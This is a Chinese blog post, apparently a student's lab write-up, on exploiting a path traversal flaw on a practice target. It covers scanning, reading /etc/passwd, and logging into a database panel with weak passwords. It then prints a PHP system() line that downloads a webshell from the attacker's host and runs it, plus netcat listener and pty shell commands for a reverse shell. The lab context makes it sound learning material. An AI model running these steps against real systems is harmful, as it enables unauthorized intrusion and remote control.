渗透记录之路径遍历

文章目录
  1. 1. 前言
  2. 2. 扫描
  3. 3. 分析
  4. 4. 监听

写在前言之前
本文章写于我刚转专业一段时间,在渗透课上使用靶机作为模拟环境学习技术。以现在的目光来看这篇报告水平实在短浅。这是我第一次使用到shell(其实那时候还并不知道什么是webshell),当时觉得这真是一门神奇的技术,未曾想过之后有一天我会用得这么熟练。
这篇报告仅是作为记录,留在blog中。

前言


路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。

这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

攻击机: kali linux 192.168.88.181

靶场机器:linux 192.168.88.107

扫描


扫描的目的是查看能用的服务,重点查找http服务。使用nikto -host
http://靶场IP地址:端口和 dirb
http://靶场IP:端口 进行http探测。

分析


下一步让我们进入该http对应的网页,查看是否存在某些东西。

看起来是个购物网站,接下来我们查看dirb扫描出的东西,查询是否有利用价值的东西。

打开该链接,查看到一个php文件,打开尝试一下。

是一个类似数据库管理界面。接下来我们考虑使用工具。

-- owasp-zap web漏洞扫描器,自动挖掘web应用程序中的漏洞;

该工具会爬取挖取当前页面的漏洞并且自行保存。从图中可以看出他会发送大量数据包。

挖取结束之后可以查看漏洞,红色代表高危漏洞,黄色代表普通漏洞。浅黄色可能无法利用。

该漏洞代表当我们访问该url时候就会弹出etcpassword信息。那让我们尝试一下,进入该url。

接下来让我们分析获得的信息。

利用目录遍历漏洞获取shell思路:

--
上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali
linux当中获取反弹shell;

同时我们尝试进入数据库后台,尝试弱口令进入。

登陆之后开始查找可以使用webshell的点。

然后开始修改webshell,使其可用。

创建shell.php,字段(写入<?php system(“cd /tmp;wget
http://ip:port/webshell.php;chmod +x webshell.php;php webshell”);?>)

监听


下一步使用python -m “simpleHTTPServer”监听回弹。

启动监听 nc

-- nc –nlvp 端口号

启动终端

-- python –c “import pty;pty.spawn(‘/bin/bash’)”

(因为这里一直在失败所以直接使用了教程的图)

接下来我们需要完成的,是对其的提权,那是下节课的任务。